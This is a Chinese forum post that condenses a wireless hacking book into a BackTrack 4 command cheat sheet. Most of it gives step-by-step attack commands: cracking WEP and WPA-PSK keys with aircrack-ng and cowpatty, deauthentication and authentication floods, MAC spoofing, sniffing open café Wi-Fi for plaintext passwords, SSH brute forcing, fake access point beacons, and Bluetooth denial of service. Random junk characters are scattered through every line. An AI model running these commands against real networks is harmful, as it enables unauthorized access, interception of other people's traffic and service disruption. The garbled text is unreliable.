少校

- 注册时间
- 2008-11-14
- 金币
- 2277 个
- 威望
- 7 个
- 荣誉
- 6 个
累计签到:14 天 连续签到:0 天 [LV.20]漫游旅程
|
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
: M* e. }4 z3 k# j
: ^9 `* @, ?! U( J: g以下所有操作均在BackTrack 4中进行。
9 m5 e- o% y; E: r" D8 _* ]% O M, n0 _' Y5 e7 H
- b' H) @% {8 `- h( U% W
无线WEP加密P解:
& O! A( |6 w+ z Q( V
- Y+ I- O7 j/ j6 Y$ Y% d, f- ^6 s注入P解:
& R F0 }5 D& v" ?. F* s7 ]. v" b; E" o; w) k
ifconfig
. g) G+ g3 T: v. B. l9 g" v/ S) z# O" {" Y( _
ifconfig –a; w B9 H: [0 N/ c! f$ M/ r; S! j
T* x8 s6 N9 w, \; B
ifconfig wlan0(无线网卡) up
5 Y7 ~$ R/ J: Z N1 y
# c( V& H- O- e @0 C& jairmon-ng start wlan0* o# E, ?* M; c( Q6 V; V# [
* p9 p- S1 X" v/ A0 h2 u
airodump-ng mon0# r, @9 m$ P: \0 R2 c" p: C, k
+ ]& O3 i5 c9 }3 k9 z* ^
airodump-ng --ivs –w ivsfile –c 频道 mon0或
" }' T& ^- ?) n5 C0 d
8 m U& C/ T( [% Z9 m7 C8 Mairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0! H6 r& B5 f- a' s9 Q( Q5 J
/ y3 g( I$ D2 \" naireplay-ng -3 –b BSSID –h Station mon0& B% n* a& f- o$ W; f
2 @3 b! b. u' D3 Y: zaircrack-ng ivsfile-01.ivs1 h. z" W7 k8 B* R* K2 K0 m# p/ u
3 T# O% v0 s2 _9 P
虚连接P解(适用于无客户端连接APP解)
# ] y- P. ]7 f+ j
0 q* X4 B1 m- d* s7 @ifconfig
" K V7 m2 ^8 x9 P8 H4 n4 t* ?) {- U& A; G, H i ~
ifconfig –a& J5 d7 S6 \% v
: Q0 q7 e j$ Q4 ] B* F# W
ifconfig wlan0(无线网卡) up
7 y `' F4 z4 [) X/ h- f* l6 H1 g4 E: I3 t5 m
airmon-ng start wlan0$ [& B( u7 c+ Y1 _! u+ d1 m: C4 a
3 u4 G. i& E0 k5 l+ |
airodump-ng mon0
" u9 _; T' `8 p* f2 V2 u
% B7 P% N& Y0 F0 [0 Vairodump-ng --ivs –w ivsfile –c 频道 mon0或
( Z# V' I& _" R, W8 N+ u( y1 |: q3 U; k3 Z7 x8 R
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
$ f& d9 e/ h8 c. o( e; h2 }' `( ?2 U1 U& r( @5 X
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0, V1 @" L5 ?# j0 X; T- J2 Z) O
0 b9 m: v4 h- L3 Yaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
2 t$ O+ ^3 f1 h) W( a/ F; G" C
' `$ A- a" }9 B" c" h1 ^aircrack-ng ivsfile-01.ivs( F. J( u# b1 x n g* ?6 Q4 N+ p: [
9 H( N; o' t1 R K: D
' \7 O6 C/ Z/ j$ C ?
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。9 ~& F3 z( }0 b/ {
+ y7 F. K7 F; \+ G" W/ k) o! z# r
* |5 g2 `! v" w; {
WPA-PSKP解
9 F7 r- n: H. p% S9 J& m1 m+ ?! H8 \% o2 I, B) F
ifconfig
1 ?) A4 M5 T# T' [# X7 `0 \ i |8 J+ i" |8 R* k
ifconfig –a( y( G7 K, M2 j) n p' i6 u
- _6 p) G4 |& E6 ]0 Uifconfig wlan0(无线网卡) up
4 b4 n% |+ q' O. {/ b
0 b* F+ |$ u& U' {airmon-ng start wlan0( i0 @* q( e; S; I6 x( ~
2 I6 {- a: X" \$ K* b! s- iairodump-ng mon06 }. ^7 _& x5 i9 Y- j
6 L' H5 U3 {( k. f. J. oairodump-ng –w capfile –c 频道 mon0
5 J) ?4 w ] ^; z" v# a
0 r- q+ H' `* L. [aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
+ T0 W9 K8 q: Q& T& S8 ]! G! h9 }$ R. |( v+ C8 N' k+ C
aircrack-ng –w Dic capfile-01.cap或) i' ?3 t c# y0 W
5 t! |! `2 B0 V2 H2 dcowpatty –f Dic –r capfile-01.cap –s SSID
; O, s! v* x2 J3 {# g% C
! Q! x$ l; O6 v( G" I+ vcowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
2 o: D6 `$ E) P7 V, E- B! Q& I2 p% p; ~8 r1 D/ B5 F+ U! o* ?
傻瓜式P解软件SpoonWPA。' } Q. f7 c# x7 D7 h- z* i
7 l8 V G) U( V6 T. k1 f' W) {BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst$ P; E/ r' G2 `( U
O. V; z) _5 F6 c6 F: i
6 C' ~$ z( I3 N5 s# J
字典文件的生成和上传 _( t0 n2 A+ R" F# Y
; _/ V) u1 w% B, o8 |( Y* G8 _3 A
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
5 Y7 w' A! W+ ]+ P: Y( r) M% w
3 Q* F" [" {3 r' N5 H, u% r
# U2 o! i9 K$ s; X$ nBT4下开启Tftp:Services—TFTPD—start TFTPD! `! v" H4 m3 S6 D% M' c
( A" O4 Z9 t. |; X7 n7 `" N a5 z
在Windows的CMD中运行 tftp –i IP put **.dic
9 S) @ t+ U: D, T% F. H
; t, F0 a# o7 n; k1 Z/ |9 |. O( x7 X [9 Q
BT4下开启SSH:Services—SSH—start SSH3 f! u: Z; Z5 Z' U1 q! K4 u A
$ o |# A. e D1 F+ {/ \Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root: C, }/ Y6 p% ]( m6 I
6 m& h2 X1 n {. _1 ?% |# S$ G- ~3 W# y4 u7 f
AP限制MAC时的解决
H6 q/ i K2 [/ _- u |/ ]6 N. L6 M# p; K
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
; o( _3 j9 Z& C) L% Q# F
" d$ ]+ @8 h: g' ^& mifconfig wlan0 hw ether NewMAC
/ I4 S1 [ O# C3 m; z* M ^+ ?% h' T, @: G
1 C+ Y4 { `6 P# t4 O/ v3 O2 |* e- _关闭SSID广播的AP探测:
% l7 H8 D% h, v E- E. t: I2 o% {$ r; ] d: C; Z, C
1. Deauth攻击:
" _! l' g* z; _- }7 D2 g
j1 f/ q0 o2 Y5 ?# P! j! b3 hairodump-ng mon0/ x" k1 ?; _& N+ x* S+ a. z
6 A! a2 h* }5 \8 uaireplay-ng -0 10 –a BSSID –h Station mon06 H( Z3 o" `' x( F% i, J. v0 X! G3 T
; i# N) [. E& r) k; b$ S& L
2. 抓包分析) s+ S: |' W5 H+ d
$ ~0 l/ P: k( E$ [
Omnipeek* ]$ r! w" V4 N! W! V1 U
- V+ c8 f3 Y$ D" |+ T: m& `
Tcpdump –n –e –vvv –i 网卡名1 S* G# o$ k0 T5 U0 C! J
7 `: r( t! x8 ?4 f3. 暴力P解
& J8 O" t2 F. B2 F: A2 r
( R( }0 U5 _% L& CCharon 1.1暴力P解
. v& l" z8 L% d9 e4 w9 Y/ p# g
+ x. B! Q% R3 w8 P1 n
9 s# m/ ~* I+ c8 Z, ^' H' J* x! J9 o% ]无线加密数据包的解密
1 @ K, {+ s2 M) `4 b
3 N' S7 ~% T4 V( P6 n
) _4 ~3 L4 H7 X使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。* c3 }3 G4 ^+ q" v/ A1 o$ c8 X- X
: f( v7 R3 x: b7 H# M2 rFilter NS DNS解析数据包. t' S+ b$ S9 n9 a, r9 S! r2 V
6 t5 b- \1 s: i2 a) @
Filter:HTTP WEB访问数据包6 q. k5 }7 A6 Q. R5 R: m
- V: D! b9 O; p( L! J$ ^) R( O
Filter:msnms MSN% e# t& h3 a# P) V% z2 \9 [
# n" Z# @% p0 \" K2 e+ z2 Y9 ECtrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
5 q* W0 u; i5 n% G7 v; U8 Q: y8 ?4 W- u: J
使用airdecap-ng解密:
9 I# k) e( W7 W/ X {/ F3 ~ V0 g. {! u; o7 ?7 }
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap: u. n- t3 j: y) p
5 M+ a8 p7 y, k+ W: K8 j/ o' T
: m4 L# t0 H! X+ ^6 l, A! s咖啡馆中无线数据截取(开放式无加密AP)0 l; Y3 e0 t+ [4 O9 T- Z: s [7 i0 S
1 j4 Z- X7 B& |/ H& g: E
1.Airodump-ng –w data –c频道 mon0
& U& a% n7 P1 g+ f9 ^" y, X$ `6 a' T( B" k) e6 d& Y7 u
2.使用WireShark打开分析
+ t5 p& c$ W B, u4 x- f% h# L+ q% I" T
; J& Q8 H+ _* X. J2 Z& \0 XBT4下的渗透工具:
8 r9 E1 ~$ Q4 {* I/ u* A6 s ~0 Z6 h& c6 o, [) U: q
nmap –sP IP/24 判断C段下存活的主机
- `0 Y% L6 T. H- x- X0 }5 }( S, P' i. N. f
nmap –vv –sS IP/24 –p Port 扫描指定端口是否开放8 N: V, F. K H
7 O1 ?# b, C+ ]9 T2 \* ^nmap –vv –sV IP –p port 指定端口的详细信息。。。
9 }( F2 B+ h* I- S/ _' J+ ~ u& |& j- Y( y) @% W* c
namp –O IP/24 判断主机的系统版本) D# V y1 B# N: ]
; N, @- S" I/ y) v
$ a5 B: A9 y3 w, \1 i5 hGUI 版nmap:Zenmap 4 X* ~6 s. x* |/ V+ j
% M _0 ^7 C% q7 F+ Q8 L& ~
- i! Y$ y# v; g. FAmap使用:amap –B IP port
- b" l) ]8 ]8 L v9 T
r! U; D& u1 Z/ a2 \3 P- CNbtscan(扫描Windows网络NetBios信息):6 }! V; d" q, c
7 |# m& B; P5 A! _, ?
nbtscan –v –s : IP/24
/ b1 @1 c |1 r' f1 o1 B b E) C: s/ A+ F# Q
nbtscan –r IP* F) Z& l- x7 c+ w! Y; u5 |
& W: a7 }# L2 g/ \1 r$ y
# s7 ?. e% O. l# EDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
* M0 H/ \* r( z6 L, v( a3 W5 N/ W0 u$ W9 P/ ~6 K9 o
/ ~. v/ }, t L% ^" h3 ^
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
6 P7 f- }5 n2 N
) G6 R5 @$ |$ h& p! D8 bBruteSSH: ./bruthe.py –h IP –u Username –d Dic
2 g, ]0 E2 i6 k1 v, q7 p% g+ A( g y
Metasploit3使用
2 L" Q4 U: M v无线D.0.S
9 q6 W* K+ W! P. W. I5 X2 G4 M& Q3 V: }! m! ^7 Y
& b" I% H( |9 |% _! _) OAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)3 i3 l! u1 H) Y) u6 \& V- w' [3 ^
( S8 y8 s% c! D" d" uairmon-ng start wlan0
0 t" D9 `) b2 r, T) B) ~' n* e1 ]; |, A) s/ T7 Q% o' E
airodump-ng mon0
& R4 J/ U; d1 r/ ^( Z2 Q( D- I
7 o. V. ^9 ?& gmdk3 mon0 a –a BSSID) \6 ^$ _+ |6 A' {
0 E+ e' E& G: f) c* Y
对所有的AP攻击:mdk3 mon0 a
]( ~, G& ^+ L
1 S% [( v' I. s6 z" |9 K
5 Y* r! G3 l0 c7 f. {2 K# rDeauth Flood 攻击; A1 p) _9 { h( w1 d3 w) ~" u
& G4 T+ V+ s6 D+ S/ a! S* smdk3 mon0 d –c Channel
* f5 o6 \2 U5 f9 s
. v+ X, l4 B: z图形化D.O.S攻击:Charon
) F9 T$ x! w/ n( u6 B
' ?& s$ S! t: C
( l1 Q9 u2 l- ~. _6 a$ k, T8 Z当受到攻击时,使用Wireshark抓包可以看到异常信息。" m5 r/ p% b `' [) S* p
+ ^3 i, R7 `- b, ?. J! J# D- x. C2 {4 Y
WPA-PSK高速P解1 F* e/ D2 ~3 W; M; e3 f
$ C& `6 Z% V/ Q V# a1. WPA-PSK PMK Hash TablesP解" j$ E! S5 t5 \% A3 T* k
8 K' M H+ ]( YCowpatty –d HashTable.hash –r ***.cap –s SSID
3 E# u: c6 q2 h' T+ a+ U. d/ }
" J1 M5 ?- y- _7 p- v+ iHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID% F! c3 S, {! a( k( v
4 a5 q( c) }% m# r; a6 r3 c: o. q2. GPU辅助高速P解
H5 j* ]6 z6 |: a
, F# `2 ]1 P* Q' ~使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
) r" @4 ?8 H- K5 e! a$ E
2 z+ n) {& h" N% F# ^6 t5 |8 h3. 分布式P解
5 {$ h; F4 K" D+ h7 A$ O4 b- R, w1 }( k3 L
" w# d0 Z# p* S5 o' Y* c
AP的伪造% _5 A% K) u; s% l/ K/ N5 S/ R7 U5 T
( j: [+ |4 P! P9 i! J0 ]; i把AP的MAC改成目标AP的MAC. H8 { x. ~, k9 x) a" f1 o7 b3 R
" K" Y$ t, k% z ^
网卡软AP
! ^: e. f; q* [* \- q1 d2 x- {% h" x
9 P6 J& L. T% ]5 h. |$ Y$ U) W2 A
! d6 L9 w3 j# V伪造大量虚假AP信号:- |1 i7 g- `3 i7 Q
; d5 y8 z- G% w3 @随机SSID:mdk3 mon0 b –g –c 频道 4 p( S+ X4 h% i
' @/ J7 W2 x; R
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
$ B& P! } Y6 v$ N/ h8 V
, c3 k6 u- h) @1 o+ }2 R/ D' ^# M: U1 c; I6 G7 H3 i0 V
War-Driving# F, K& U* D& m& _
- I( G! F+ d8 Z* G. u7 a0 J
热点地图绘制) f% J' {+ l4 t- z/ \
) ~9 t& P6 C( P. `Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。1 ]" k, Y# l* I
3 [5 m! v& p6 ?: n2 \9 S2 r# K5 J, P& D3 X/ W& l
Netstumble# `& e1 i' S4 H- q
* r8 ^0 ]) i9 A" z: o8 h! M6 U5 T' Z7 O5 q4 W5 }: b; \/ Z
蓝牙Hacking" o+ p$ B) J& h! h/ s! j+ o
7 P* B. P8 [+ M, W: L& j3 B* m
Windows下的Blue Soleil工具' u+ \. o( m* |7 j4 }1 N& ]$ v
* {! V2 {- _6 T; M
BT4:- H" N0 r3 b0 f# A, N+ F
4 ]9 K* r7 M* Y; z* ~9 ?3 ?$ U: Ehciconfig 查看蓝牙适配器+ ~, M3 r% `1 ^: X# o7 F4 i3 |! G
2 Z0 m/ r& x1 Q! ghciconfig hci0 up 载入蓝牙适配器& e* v' z' `; Z! }4 v1 I
* k( E7 B# G9 J( @% M+ A* t$ D
hciconfig hci0 class 蓝牙适配器详细信息
: ]/ Z/ q. l$ j( o7 B( y% G% _1 q- l$ W! r8 h) E# M
- g1 z- _" s/ I: I; A# |% F) P
hcitool(扫描蓝牙)
) p2 B! E; A% }% f
. t4 T# [$ \8 t( _hcitool –i hci0 scan
% n5 n% Z- T: r0 H6 a+ R" Y7 n; e1 ~
BTscanner(扫描蓝牙)
t9 _' U: u5 n& ]4 _1 F4 t2 _# Y4 y, H; `/ ^- _2 Z# H
! z: G& z! z7 ^$ \, r蓝牙攻击:9 @+ \( c6 s2 r6 a F
; g/ V; p; Q: ^9 sBlueBugging (适用于BlueTooth V1.1的手机)9 `* L; E; F$ x3 u+ Q
Q; G3 ^- ~, @# Q8 ?
Bluebugger工具:# d: n; G, z$ o) H
t# t1 b+ S' o, G& u( O0 T8 ?Bulebugger –a HD_Addr info
4 L$ P$ g$ T/ ?5 k; ]9 b& V
+ `& D; e) J& z5 y& B% n# D6 p" u* X0 ~! S4 V. ]/ S: w/ Q( r$ ?7 a9 @; D
BlueJacking* s! Z, K) d5 T7 d4 S) A9 F/ Z
& f4 ^4 p- H0 j5 K
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。4 X; o$ \' H' G/ [- }6 P9 K
1 z8 ~8 v! r6 P9 O3 O- A
9 ~3 K" Z [2 L5 e0 I: }( u6 KHD_Addr修改:
. }$ J& X0 O& c/ A) a2 K( m- c' Q2 |- L5 C5 ?
Bdaddr工具
3 z7 M: ~& H7 W5 f: ]! Q3 L
3 p# s& Q9 ?8 r! U4 k; E- P Gbdaddr –i 蓝牙设备名 新HD_addr
' N& \7 }, L5 z/ U5 B/ T4 @
% [1 f6 Y( O: S- V r
4 X3 y' T% z! z蓝牙D.O.S8 x; S- W, W7 _/ @' Y
6 i3 s' A' @' O5 b6 b, u. U
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
6 @3 }( v: F3 @0 A" r/ u% T" S9 p1 _3 b/ M ^. U) S4 d
hciconfig* a5 z1 [1 c: e" y
. i7 j4 }: H; N9 u4 @6 T- x
hciconfig hci0 up
4 k7 V, o" \- `) C2 s. K
3 F6 e8 w6 [8 b! Vhcitool –i hci0 scan3 k: {- E3 L$ R( F
! [4 b/ }$ i/ H4 K v/ e" L P
l2ping –s 10000 –目标MAC4 ~2 s# [$ s; Y: t
/ P* B; U' E/ g E3 L+ p; _' l6 u" O& m4 g+ G! @' S$ x0 p: n
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
1 A- S4 x; D4 o
" j3 }* f% U2 x3 d3 [" p./fang –r ************-############ -s
8 ], n) z6 `) B" R
* w: Q% D0 @4 u4 d暴力P解************-############的蓝牙设备
2 L5 r, K# u. }* b3 L3 K, F5 h4 L- f! V! Z/ s- W: P2 h. _
./fang –l 各厂商BD_Addr分配' y, \& j9 t1 L7 B% g0 B: \6 J
, F2 P+ G5 d/ l4 J# u9 O- {4 ?% o, h( J5 p/ s, b
WifiZoo使用7 i5 L: |! u. E7 v2 O% v
+ a7 X5 t4 x" W0 H./wifizoo.py –c Capfile
. X0 D2 G6 `& C/ G$ }- b) m; s
2 a! N# K8 F5 h s: y访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情 |
评分
-
2
查看全部评分
-
|